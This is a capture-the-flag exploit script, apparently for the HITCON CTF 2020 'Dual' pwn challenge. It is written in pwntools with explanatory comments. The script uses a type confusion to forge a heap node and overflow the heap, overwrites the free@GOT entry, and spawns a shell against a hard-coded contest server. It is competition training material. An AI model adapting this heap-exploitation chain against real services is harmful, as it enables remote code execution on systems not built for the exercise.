

HITCON CTF 2020 / Dual

Fuzzing with AFL -> Awesome crash -> Type confusion -> Heap overflow -> AAW -> RCE

 

from pwn import *

def go(a, b):
    """Read from the global tube ``p`` until *a* appears, then send *b* as one line.

    Both arguments are passed through ``str()``: ints and str are fine, but a
    ``bytes`` value would be sent as its repr (``b'...'``), so callers use str/int.
    """
    prompt = str(a)
    answer = str(b)
    p.recvuntil(prompt)
    p.sendline(answer)
def add(pred):
    """Select menu option ``'1'`` at the ``>`` prompt, then answer the next ``>`` with *pred*.

    What option 1 does is not visible here; the name is the author's label for it.
    """
    for answer in ('1', pred):
        go(">", answer)
def link(pred, succ):
    """Select menu option ``'2'`` at the ``>`` prompt, then answer the two follow-up prompts with *pred* and *succ*.

    What option 2 does is not visible here; the name is the author's label for it.
    """
    for answer in ('2', pred, succ):
        go(">", answer)
# Stage 1: the initial input script fed to the challenge binary on connect.
# The author originally loaded it from the AFL crash file "null"; the inline
# bytes below are that input with the trailing length rendered via %d.
#payload = open("null").read()
#print(payload.encode('hex'))
payload =b"""5
E23

7
1
E2
7
7?
4

%d
"""%(0x39)
# 0x39 == 57 == 7 * 8 + 1: the length of the fake node below plus one, which
# matches the "len(payload)+1" convention used for the second send further down
# (inferred from the sizes; the binary's length handling is not shown here).
##FAKE NODE #####
# Seven qwords forming a node record as the author reverse-engineered it; the
# field labels are the author's. Only id, "linked pointer", "text size" and
# "text idx" are named; 0x22/0x44/0x55 are unlabelled filler values.
payload+=p64(0xdead)#find id
payload+=p64(0x22)
payload+=p64(0x33)#linked pointer
payload+=p64(0x44)
payload+=p64(0x55)
payload+=p64(0xdeadbeef) #text size
payload+=p64(0x0)#text idx
#################


# Same "5 / E23" menu sequence as at the top of the script (meaning not shown here).
payload+=b"""
5
E23

"""


#### command with fake node ###
# Menu option 4 addressed to id 0xdead, i.e. the fake node injected above.
payload+=b"""4
%d
"""%0xdead

# Target selection: local binary (commented out) or the contest server.
# The address/port are the CTF-time values and are hard-coded; the binary
# name below is the challenge's distributed file.
#p= process('dual-2df8d4005c5d4ffc03183a96a5d9cb55ac4ee56dfb589d65b0bf4501a586a4b0')
p = remote("13.231.226.137", 9573)
# gdb script used during local debugging; all breakpoints but one are disabled
# and gdb.attach itself is commented out, so this has no effect against remote.
# $pool and the breakpoint addresses are binary-specific constants the author
# obtained from reversing; their derivation is not part of this listing.
cmd = "set $pool = 0x519170\n"
#cmd+="b find_node\n"
#cmd+="b *0x040468B  \n" #find_node -> compare
#cmd+="b *0x000000404D5C    \n" #write_text -> call find_node
#cmd+="b *0x404CB4\n" #break new in write_text
#cmd+="b *0x0404CEB  \n" #break free in write_text
cmd+="b *0x044B95A \n"
cmd+="c\n"
#gdb.attach(p,cmd)
# send(), not sendline(): the stage-1 script already ends with a newline.
p.send(payload)

# Stage 2: the text written through the fake node. Per the author's comments
# it lays out a forged chunk header (size field 0x21) followed by a pointer to
# the binary's free@GOT entry (0x0519068). The 0x68/0x78/0x70/0x23 offsets are
# tuned to the binary's heap layout and are not derivable from this listing.
payload = b"\x00"*(0x68+0x78)
payload+=b"a"*(0x70-0x23-0x8)
payload+=p64(0x21)#freed chunk's meta data
payload+=b"c"*(0x23-8)
payload+=p64(0x21)
payload+=p64(0x0519068) #free GOT
# Length prompt expects the byte count plus one (same convention as 0x39 above).
p.sendline("%d"%(len(payload)+1))
p.sendline(payload)

# Option 4 on idx 0 with length 20 and 19 bytes of filler; presumably a
# write that moves the corrupted state into place -- effect not visible here.
p.sendline("4")
p.sendline("0")#idx
p.sendline("20")
p.sendline("a"*19)

# Option 4 on idx 0 again, length 24: the 23-byte text is 0x044B95A (the same
# address as the enabled gdb breakpoint above) padded with spaces. Given the
# free@GOT pointer planted in stage 2, this presumably overwrites that GOT slot;
# the final "/bin/sh" line is the input the author expects the hijacked call
# to receive. What 0x044B95A resolves to in the binary is not shown on this page.
p.sendline("4")
p.sendline("0")
p.sendline("24")
payload = p64(0x044B95A)
payload = payload.ljust(23)
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()
